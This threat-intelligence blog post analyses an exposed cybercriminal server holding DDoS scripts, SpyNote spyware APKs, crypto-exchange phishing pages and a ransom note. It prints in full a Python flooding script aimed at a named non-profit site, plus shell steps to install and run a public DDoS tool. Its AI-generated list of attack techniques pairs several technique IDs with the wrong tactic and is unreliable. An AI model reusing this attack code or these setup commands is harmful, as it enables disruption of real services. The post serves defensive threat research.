Exploring a Cybercriminal’s Server: DDoS Tools, Spyware APKs, and Phishing Templates | Hunt.io

Short Summary

This article investigates a cybercriminal’s exposed server that contained various malicious tools, including DDoS scripts, SpyNote spyware disguised as popular apps, phishing pages targeting cryptocurrency companies, and ransom notes suggesting ransomware delivery. The findings provide insights into the tactics and strategies employed by cybercriminals to exploit unsuspecting networks.

Key Points

• Discovery of a cybercriminal’s exposed server with various malicious tools.
• Identification of DDoS scripts, including a Python script (ddos.py) and Bash commands (ddos.txt).
• SpyNote spyware disguised as legitimate applications like Chrome and Telegram.
• Phishing pages impersonating login interfaces for cryptocurrency platforms such as Binance and Coinbase.
• Ransom notes indicating potential ransomware delivery.
• Evidence of broad targeting strategies aimed at compromising diverse user groups.

MITRE ATT&CK TTPs – created by AI

• Initial Access (T1071)
  • Phishing: Use of phishing pages to steal credentials.
• Execution (T1203)
  • Execution of DDoS scripts and malware via compromised applications.
• Persistence (T1136)
  • Use of malicious apps to maintain access to compromised devices.
• Credential Access (T1081)
  • Stealing credentials through phishing pages and malicious apps.
• Exfiltration (T1041)
  • Sending stolen data to external servers via command and control (C2) channels.
• Impact (T1486)
  • Ransomware delivery indicated by ransom notes demanding payment.

Introduction

During a recent investigation, we uncovered a cybercriminal’s exposed server containing DDoS scripts, SpyNote spyware disguised as popular apps, phishing pages targeting digital currency companies and messaging platforms, and ransom notes hinting at ransomware delivery. This find gave us a unique opportunity to examine the tools these criminals rely on and the types of victims they choose.

In today’s post, we’ll discuss the discovered files and illuminate the tactics and strategies used to target unsuspecting networks.

We’ll start our investigation of the server with the DDoS tools ddos.py and ddos.txt. The Python script is designed (albeit not very good) to launch a denial-of-service attack against the website aisrael[.]org.

The target website is a non-profit organization established in 1999 to promote accessibility and inclusion for people with disabilities and the elderly in Israel.

ddos.py attempts to overwhelm the server by sending a large number of HTTP requests using the requests library in rapid succession. While the code itself is rudimentary and contains errors, the intent is clear: to disrupt access to the targeted site by exhausting its resources. The program opens with a simplistic ASCII banner displaying “DDoS Attack.”

The code for ddos.py is below:

Copy text
import threading
import requests
import pyfiglet
import time

Z = '33[1;31m' # أحمر
B = '33[1;34m' # أزرق
L = '33[1;33m' # أصفر
X = '33[0m'

logo = pyfiglet.figlet_format('DDOS Attack')
print(Z + logo + Z)
url = "
https://aisrael.org/
" # رابط الهدف
threads = 100000000000000000000000000
print(f'{B}-----------------------')

def text(string):
    for char in string:
        print(char, end="", flush=True)
        time.sleep(10 / 1000)

def send_request():
    while True:
        try:
            response = send_request.get(url)
            print(f"DDOS Attack : {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"Error: {e}")

for i in range(threads):
    thread = threading.Thread(target=send_request)
    thread.start()

Code content of ddos.py

Despite its flaws, ddos.py reflects a straightforward approach to causing service disruption, relying on the sheer volume of requests to impact server performance. Although not sophisticated, this tool demonstrates the capabilities of less experienced threat actors.

Notably, the script also has several comments written in Arabic, which could indicate potential attribution to an Arabic-speaking actor or someone who can use Google Translate.

Unlike ddos.py, ddos.txt contains a series of Bash commands designed to prepare a server environment to download a DDoS program from a public GitHub repository.

The repo is titled “ZxCDDoS,” originally uploaded by user hoaan1995 and billed as an educational tool.

Figure 1: Snippet of ZxCDDoS GitHub repository README

ddos.txt: 

Copy text
Debain, Ubuntu (Ubuntu 20.04 better):
sudo apt-get install git -y
sudo apt-get install golang -y
sudo apt-get install perl -y
sudo apt-get install python3 -y
sudo apt-get install python2 -y
sudo apt-get install python3-pip -y
curl -sL https://deb.nodesource.com/setup_16.x | sudo -E bash -;sudo apt -y install nodejs

How to use:
- Recommended in shell of google, azure,...
- Using vps with high speed will be stronger

git clone https://github.com/hoaan1995/ZxCDDoS/
cd ZxCDDoS/
npm i requests https-proxy-agent crypto-random-string events fs net cloudscraper request hcaptcha-solver randomstring cluster cloudflare-bypasser http http2 crypto tls
pip3 install -r requirements.txt
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
apt-get install ./google-chrome-stable_current_amd64.deb
ulimit -n 999999
chmod 777 *
python3 c2.py

212.219.15.12
https://www.jcie.org.uk/content/content.aspx?ID=26

Commands of ddos.txt

ddos.txt starts with instructions for installing various dependencies on Debian/Ubuntu systems, such as Git, Golang, and Python. The ZxCDDoS tool and necessary Python and Node.js libraries are downloaded upon completion.

These commands suggest the attacker aims to streamline the setup process, making it easy to launch an attack by providing all the necessary components in a ready-to-use format.

SpyNote APKs

Chrome.apk and Telegram(3) .apk exhibit typical capabilities associated with the SpyNote spyware family. Due to this routine behavior, we won’t analyze these files.

What is worth noting are the C2s used by these malicious apps. Chrome.apk connects to an IP address (142.93.113[.]245:7771) hosted on Digital Ocean, while the fake Telegram APK communicates with the open directory that is the subject of this blog on the same port.

The third APK, rn.apk, disguised as an app called “Education Hub,” presents an interesting deviation from the typical SpyNote malware characteristics seen in the other samples. Unlike Chrome.apk and Telegram(3).apk, rn.apk is not detected as SpyNote malware according to VirusTotal but is flagged as standard riskware instead. Riskware generally refers to software that may not be inherently malicious but poses security risks due to how it can be exploited.

While the other APKs engage in malicious activities, rn.apk operates under a different category, potentially using permissions or features that could be abused by a threat actor to access sensitive information.

Despite the lack of observable C2 communication and specific SpyNote detection for rn.apk, its presence within the threat actor’s toolkit points to a more expansive strategy. The actor demonstrates a broad targeting approach by targeting users of widely trusted applications like Chrome and Telegram and those searching for educational resources.

A wide net was likely purposefully cast, increasing the likelihood of compromising diverse user groups and expanding the overall attack surface.

Phishing Pages

As mentioned in the introduction, the HTML pages on the server impersonate login interfaces for various organizations, aiming to steal credentials and sensitive information. The targets include:

• Binance

• WeChat

• Coinbase

• Kraken

The HTML source code of most malicious login pages references EagleSpy, an Android RAT that allows attackers to steal login credentials, manipulate the victim’s screen, and more.

Figure 3: HTML source of one of the phishing pages referencing EagleSpy malware

Figure 4: Screenshot of binance.html, designed for mobile devices

Figure 5: kraken.html, malicious login page

Figure 6: wechat.html. The message in Chinese is: “Unauthorized detected Please verify WeChat payment password to access the app”

Two additional web pages mimic native mobile phone unlock screens, such as pattern and PIN entry prompts. When unsuspecting users enter their unlock pattern on PIN, the information is sent to an unidentified Telegram account.

Stealing device credentials would allow the attacker to remotely unlock the device to access sensitive apps, data, and accounts. Additionally, this information can be used to lock the victim’s device, effectively holding it hostage until a ransom is paid.

Figure 7: Screenshot of pin.html. Targeting Russian speakers, the message can be translated to “Enter the pin code”

Figure 8: Screenshot of pattern.html. When the machine translated from Russian, the message  reads, “Screen Unlock Pattern”

Ransomeware?

Within the “ransomeware” folder are two HTML files, crypto.html, and ransomware.html. The latter consists of a splash screen with an animation that says, “Oops! Your Phone has been hacked!” At the bottom of the screen is a “UNLOCK” button that redirects users to crypto.html.

Figure 8: Animated screen informing the victim their phone has been hacked

Likely, crypto.html is still a work in progress, as the included QR code in the ransom note does not lead to a website, and the default wallet type, “USDT TRC20,” contains what appears to be a wallet address of “bc1qwqfp5hhpqjm8lq5rfp.”

However, the address resembles a Bech32 Bitcoin address, not a valid USDT TRC20 one.

The note demands the victim “PAY 7K$ in BTC” at the top of the page and then asks for $9k within two hours to prevent the stolen information from being uploaded to the Dark web.

Figure 9 shows a screenshot of crypto.html.

Figure 9: crypto.html ransom note displayed after clicking unlock

Final Thoughts

In this blog post, we explored the inner workings of a cybercriminal’s server, uncovering malicious tools to disrupt services and compromise mobile users. From DDoS scripts designed to overwhelm targets like aisrael.org to mobile spyware such as SpyNote and EagleSpy, the server revealed a broad scope of criminal activity.

To uncover potential cyber threats among the thousands of open directories the Hunt platform is tracking, request a free demo today.

Network Observables

Source: https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages